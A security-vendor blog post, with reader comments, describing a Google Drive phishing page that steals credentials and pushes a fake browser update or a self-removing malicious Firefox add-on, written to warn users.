This Phishing Page Can Do More Than Just Steal Your Credentials

[Update April 4, 2014 9:21AM PDT] Our friends at PhishLabs recorded and posted a video of a fake Google Drive and Docs phishing scam in action. Check out their post here.

Original story:

Every now and again, we read reports about phishing sites that look dangerously convincing—you can hardly tell the real one apart from the fake one anymore, unless you know what to look for and where. Our friends at Symantec found one such site some time in March.

The interesting bits about their find are that the scam page was actually hosted on Google’s server and sported an https scheme name in front of the URL, which is what a genuine Google URL normally looks like. These made spotting the phish page almost impossible for anyone attempting to access their Google Docs or Google Drive account.

There are several fake Google sites out there that may not look as compelling and sophisticated as the Symantec find, but I have no doubt that these sites would have their share of victims, too.

Sample of a Google Docs phishing page in the wild

Our research has led us to a fresh Google login clone that has the same interesting bits I mentioned above; however, not only does this page cater to stealing credentials but also on the downloading of malicious payload.

Users of our products are protected from this web threat as Malwarebytes Anti-Malware already detects asdf.exe and its duplicates as Backdoor.Bot. This executable has a VirusTotal rating of 16/51 as of this writing.

The phishing page in question contains code that allows it to identify the browser type used to access it. It pops up an overlay message notifying the user that he/she needs to download a supposed set-up file in order to update their browser (and perhaps eventually the “outdated plug-ins”).

We have observed that the overlaying only works on selected browsers, particularly Internet Explorer, Chrome, and Firefox. If you may recall, these are the top three most used browsers worldwide.

Phish page accessed via IE (click to enlarge)

Phish page accessed via Chrome (click to enlarge)

Phish page accessed via Firefox (click to enlarge)

Once Chrome and IE users click “Accept and Install”, Chrome_Plug-in_EN-US_WOL_WIN.exe and Internet_Explorer_EN-US_WOL_WIN.exe are downloaded onto their machines, respectively. These file are actually duplicates of each other.

For Firefox users, the scenario is quite different: instead of an executable file, they are asked to download a browser add-on or extension named addon.xpi from a publicly accessible Dropbox folder.

Phish page wants you to install a malicious Firefox add-on
(click to enlarge)

The said .XPI, once expanded, contains the executable file, asdf.exe—another copy of the IE/Chrome download file. The JavaScript file, which is contained within the package, consists of instructions that run the malicious executable at the same time as the add-on is being installed.

Finally, this extension uninstalls itself from Firefox, thus, restoring the original state of the browser before the user encountered the phishing page. The system, however, is already infected by a malicious payload without the user’s knowledge.

Although the downloading of malicious payloads cannot be replicated on the side of users who normally make use of Safari, Opera, or other browsers, we urge them to keep their guard up.

The phishing page can and will fool users into thinking that they are logging on to their Google Drive accounts if they’re not careful. It’s no longer enough to see https on the address bar and think it’s the real thing.

Phish page accessed via Safari (click to enlarge)

Eyes open, everyone.

Jovi Umawing

pegleghorace

I am interested as to why you have blacked out the names of the fake Google phishing sites in the article above. Surely exposing them publicly would add yet another layer of protection from them??

Herman Morgan

Thanks for the great explanation of how the Google Doc’s scam worked. I have encounter a couple of the “Update Required” scams as well. The one I want to mention is an apparent “Update” for ‘Windows Media Player’, which two of my friends have clicked on at some ‘adult’ sites, resulting in a virus that I couldn’t isolate nor block with my IOLO System Shield, couldn’t find, nor could the anti-malware app I used. (Not MalwareBytes, which is great). Anyway, I ended up sweeping both those drives to defeat that **** bug, so I thought I’d share that with Our friends.

i think i got almost the same case, but instead of installing addons, every time i open some website (google, facebook, bing, yahoo, and some more) i got a warning about an outdated browser and or flash player then the web page sent me to the download page to download a malicious software, i’ve scanned my whole laptop with bitdefender and malwarebytes and both of them telling me that my laptop was clean. how can i fix it?